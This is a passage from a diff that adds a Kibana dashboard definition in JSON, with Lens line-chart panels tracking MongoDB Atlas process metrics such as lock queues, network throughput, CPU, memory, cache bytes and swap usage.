true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.global.lock.current_queue.reader.count\": *" + }, + "isBucketed": false, + "label": "reader", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.global.lock.current_queue.reader.count" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9e1d1374-9c80-4d65-9ecd-4ae5c898bf9c", + "430fe7e4-1762-4390-b786-6d91aac55994" + ], + "layerId": "cd89a53e-75f8-4ccd-9234-05124250cc7b", + "layerType": "data", + "seriesType": "line", + "xAccessor": "98425ac2-3325-414a-a990-b290ad0ebdf2", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Global lock Data", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "d3f6c424-e228-438c-8b54-e7229f252220", + "w": 16, + "x": 16, + "y": 18 + }, + "panelIndex": "d3f6c424-e228-438c-8b54-e7229f252220", + "title": "Number of operations queued and waiting for lock [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "4bae4135-aa8b-47ba-bbd7-6a22b4b3697c": { + "columnOrder": [ + "9ea8b9a9-be57-40fd-8afd-34037f25342c", + "6444b274-4ebe-4898-8cef-5271e9e1ff54", + "121fbb4f-be86-4152-ab18-855573e73fac" + ], + "columns": { + "121fbb4f-be86-4152-ab18-855573e73fac": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "bytesOut", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.network.out" + }, + "6444b274-4ebe-4898-8cef-5271e9e1ff54": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "bytesIn", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.network.in" + }, + "9ea8b9a9-be57-40fd-8afd-34037f25342c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "6444b274-4ebe-4898-8cef-5271e9e1ff54", + "121fbb4f-be86-4152-ab18-855573e73fac" + ], + "layerId": "4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "9ea8b9a9-be57-40fd-8afd-34037f25342c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Average" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "0ee6e613-07de-475e-b46c-4b10669be400", + "w": 16, + "x": 32, + "y": 9 + }, + "panelIndex": "0ee6e613-07de-475e-b46c-4b10669be400", + "title": "Network throughput over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-072715a7-2316-42ca-9272-7bac814074e3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "072715a7-2316-42ca-9272-7bac814074e3": { + "columnOrder": [ + "98bd06e3-8c06-4e53-9f14-3b32d7c0da97", + "612322a5-f707-4b2f-bc3e-7237dc475e59", + "1e21a64b-d369-4b4a-a32d-5647705b5fea", + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145", + "7e266a96-97bf-464e-8f89-ffb06fe28ae8" + ], + "columns": { + "1e21a64b-d369-4b4a-a32d-5647705b5fea": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.children.kernel.pct\": *" + }, + "isBucketed": false, + "label": "normalized kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.children.kernel.pct" + }, + "612322a5-f707-4b2f-bc3e-7237dc475e59": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.children.kernel.pct\": *" + }, + "isBucketed": false, + "label": "kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.children.kernel.pct" + }, + "7e266a96-97bf-464e-8f89-ffb06fe28ae8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.user.pct\": *" + }, + "isBucketed": false, + "label": "normalized user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.user.pct" + }, + "98bd06e3-8c06-4e53-9f14-3b32d7c0da97": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.children.user.pct\": *" + }, + "isBucketed": false, + "label": "user ", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.children.user.pct" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "612322a5-f707-4b2f-bc3e-7237dc475e59", + "c1dfcc14-1fc9-430e-8ef0-ac848e07e145", + "7e266a96-97bf-464e-8f89-ffb06fe28ae8", + "1e21a64b-d369-4b4a-a32d-5647705b5fea" + ], + "layerId": "072715a7-2316-42ca-9272-7bac814074e3", + "layerType": "data", + "seriesType": "line", + "xAccessor": "98bd06e3-8c06-4e53-9f14-3b32d7c0da97" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Cpu ", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "7debedbb-89c5-4585-a78e-8b891ddb5d73", + "w": 16, + "x": 0, + "y": 27 + }, + "panelIndex": "7debedbb-89c5-4585-a78e-8b891ddb5d73", + "title": "Process CPU children over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d9480e62-ff0a-47b5-b162-2374ef9a9ee0": { + "columnOrder": [ + "c8b2c286-a576-4f4b-835c-8ca63597d779", + "fe6bc717-88d8-490b-861b-8d06f85654b1", + "f2af4b65-6169-44f7-8daa-930be4990d94", + "b37ba5b7-3473-49cb-894d-2b11208982c6", + "6177537b-7f30-4db1-a283-12aa94f1fc61" + ], + "columns": { + "6177537b-7f30-4db1-a283-12aa94f1fc61": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.user.pct\": *" + }, + "isBucketed": false, + "label": "normalized user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.user.pct" + }, + "b37ba5b7-3473-49cb-894d-2b11208982c6": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.user.pct\": *" + }, + "isBucketed": false, + "label": "user", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.user.pct" + }, + "c8b2c286-a576-4f4b-835c-8ca63597d779": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "f2af4b65-6169-44f7-8daa-930be4990d94": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.normalized.kernel.pct\": *" + }, + "isBucketed": false, + "label": "normalized kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.normalized.kernel.pct" + }, + "fe6bc717-88d8-490b-861b-8d06f85654b1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cpu.kernel.pct\": *" + }, + "isBucketed": false, + "label": "kernel", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cpu.kernel.pct" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "fe6bc717-88d8-490b-861b-8d06f85654b1", + "f2af4b65-6169-44f7-8daa-930be4990d94", + "6177537b-7f30-4db1-a283-12aa94f1fc61", + "b37ba5b7-3473-49cb-894d-2b11208982c6" + ], + "layerId": "d9480e62-ff0a-47b5-b162-2374ef9a9ee0", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "c8b2c286-a576-4f4b-835c-8ca63597d779" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "e1449935-a76f-46e2-ba55-9b11be523b92", + "w": 16, + "x": 16, + "y": 27 + }, + "panelIndex": "e1449935-a76f-46e2-ba55-9b11be523b92", + "title": "Process CPU over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "55e0cd65-77ab-4f8e-8c15-fc729d143dc1": { + "columnOrder": [ + "aff91a31-30ed-474c-80c6-0150677e5fe9", + "a1042f4d-c560-4aa6-9e4b-304f40f4761a", + "acab90b9-ff5d-489f-9aff-fc76e23a6091", + "ffc53296-5d32-4911-86b2-68bafbf4deab" + ], + "columns": { + "a1042f4d-c560-4aa6-9e4b-304f40f4761a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.mapped.mb\": *" + }, + "isBucketed": false, + "label": "mapped", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.mapped.mb" + }, + "acab90b9-ff5d-489f-9aff-fc76e23a6091": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.resident.mb\": *" + }, + "isBucketed": false, + "label": "resident", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.resident.mb" + }, + "aff91a31-30ed-474c-80c6-0150677e5fe9": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ffc53296-5d32-4911-86b2-68bafbf4deab": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.memory.virtual.mb\": *" + }, + "isBucketed": false, + "label": "virtual", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "MB" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.memory.virtual.mb" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a1042f4d-c560-4aa6-9e4b-304f40f4761a", + "acab90b9-ff5d-489f-9aff-fc76e23a6091", + "ffc53296-5d32-4911-86b2-68bafbf4deab" + ], + "layerId": "55e0cd65-77ab-4f8e-8c15-fc729d143dc1", + "layerType": "data", + "seriesType": "line", + "xAccessor": "aff91a31-30ed-474c-80c6-0150677e5fe9" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } + }, + "title": "Memory usage[Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e", + "w": 16, + "x": 32, + "y": 27 + }, + "panelIndex": "e2e5e19d-83ad-4179-b868-69da9f4b3f4e", + "title": "Memory usage over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a63e3a4f-5884-406a-b804-9462f72589c2", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "a63e3a4f-5884-406a-b804-9462f72589c2": { + "columnOrder": [ + "df567229-64c3-44f4-bb52-70bbf227a907", + "98e8d385-d8c3-44fe-bebc-a0385afa0151", + "9931accf-2758-4a94-a2d1-8147544f8972" + ], + "columns": { + "98e8d385-d8c3-44fe-bebc-a0385afa0151": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.read.bytes\": *" + }, + "isBucketed": false, + "label": "read ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.read.bytes" + }, + "9931accf-2758-4a94-a2d1-8147544f8972": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.write.bytes\": *" + }, + "isBucketed": false, + "label": "write", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "showArrayValues": false, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.write.bytes" + }, + "df567229-64c3-44f4-bb52-70bbf227a907": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "98e8d385-d8c3-44fe-bebc-a0385afa0151", + "9931accf-2758-4a94-a2d1-8147544f8972" + ], + "layerId": "a63e3a4f-5884-406a-b804-9462f72589c2", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "df567229-64c3-44f4-bb52-70bbf227a907", + "yConfig": [ + { + "axisMode": "auto", + "forAccessor": "9931accf-2758-4a94-a2d1-8147544f8972" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "59d5ec89-8838-4419-a1c0-3644f7093ad0", + "w": 16, + "x": 0, + "y": 36 + }, + "panelIndex": "59d5ec89-8838-4419-a1c0-3644f7093ad0", + "title": "Cache read and write bytes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "66e5b503-2f90-4e9c-95ad-bafe27f2ebe3": { + "columnOrder": [ + "aaf7fe8d-30c1-41ce-bced-454c0723a329", + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3", + "6da1fe19-f219-4038-a71a-8c434b29399f" + ], + "columns": { + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.dirty.bytes\": *" + }, + "isBucketed": false, + "label": "dirty ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2, + "suffix": "" + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.dirty.bytes" + }, + "6da1fe19-f219-4038-a71a-8c434b29399f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.cache.used.total.bytes\": *" + }, + "isBucketed": false, + "label": "total used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.cache.used.total.bytes" + }, + "aaf7fe8d-30c1-41ce-bced-454c0723a329": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "03dc2a9b-a11f-48d6-8bfc-7afaef9be5e3", + "6da1fe19-f219-4038-a71a-8c434b29399f" + ], + "layerId": "66e5b503-2f90-4e9c-95ad-bafe27f2ebe3", + "layerType": "data", + "seriesType": "line", + "xAccessor": "aaf7fe8d-30c1-41ce-bced-454c0723a329" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "Cache dirty and total used bytes [Metrics MongoDB Atlas]", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "2322e519-d472-4a4f-8fa5-adba86fd8eea", + "w": 16, + "x": 16, + "y": 36 + }, + "panelIndex": "2322e519-d472-4a4f-8fa5-adba86fd8eea", + "title": "Cache dirty and total used bytes over time [Metrics MongoDB Atlas]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "579dbfe1-e5b4-47bd-9bd6-c913ca79a155": { + "columnOrder": [ + "46d2a977-f1d8-4f65-a286-8bb794904047", + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f", + "db47f211-add2-4aa7-b0ec-827b5bd82c95" + ], + "columns": { + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.swap.usage.total.free\": *" + }, + "isBucketed": false, + "label": "free", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.swap.usage.total.free" + }, + "46d2a977-f1d8-4f65-a286-8bb794904047": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "db47f211-add2-4aa7-b0ec-827b5bd82c95": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "\"mongodb_atlas.process.swap.usage.total.used\": *" + }, + "isBucketed": false, + "label": "used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "mongodb_atlas.process.swap.usage.total.used" + } + }, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "emphasizeFitting": true, + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "db47f211-add2-4aa7-b0ec-827b5bd82c95", + "2eb5bea0-f4a9-421b-afb8-3fd4f28d287f" + ], + "layerId": "579dbfe1-e5b4-47bd-9bd6-c913ca79a155", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "46d2a977-f1d8-4f65-a286-8bb794904047" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yTitle": "Count" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 9, + "i": "fbc90d78-1b6b-4650-8840-c89d287cf3ca", + "w": 16, + "x": 32, + "y": 36 + }, + "panelIndex": "fbc90d78-1b6b-4650-8840-c89d287cf3ca", + "title": "Swap space over time [Metrics MongoDB Atlas]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Metrics MongoDB Atlas] MongoDB Process", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-04-12T07:06:39.544Z", + "id": "mongodb_atlas-b435ef26-546b-4e56-994e-90544e208c72", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8f13f3ed-3700-4ea1-9f9a-396a1f1fe178:indexpattern-datasource-layer-cd73b358-0ca8-41b8-98a1-376efe82ebeb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "68be7160-9c8d-46a7-9daa-ee2cf0337f45:indexpattern-datasource-layer-9cc9c8cf-8031-491d-ad68-65c9bee42961", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "25051106-745b-4ba4-a8d9-49034e1f4abb:indexpattern-datasource-layer-9e13bc03-ef64-4c17-aa85-6a64c035c2df", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "262ae11d-86af-4aa4-b53a-55dabb3bbcc2:indexpattern-datasource-layer-d632a616-b51b-4039-af6c-a764c3635443", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "20587478-8b77-4d72-ab6f-0e4781c04306:indexpattern-datasource-layer-dec2bdc9-b28b-4737-b097-4784fc539a8e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c0fee763-07b4-4e33-9435-f5953a528bfc:indexpattern-datasource-layer-a642128d-1d1f-433c-9412-738ea3def1fb", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "d3f6c424-e228-438c-8b54-e7229f252220:indexpattern-datasource-layer-cd89a53e-75f8-4ccd-9234-05124250cc7b", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0ee6e613-07de-475e-b46c-4b10669be400:indexpattern-datasource-layer-4bae4135-aa8b-47ba-bbd7-6a22b4b3697c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 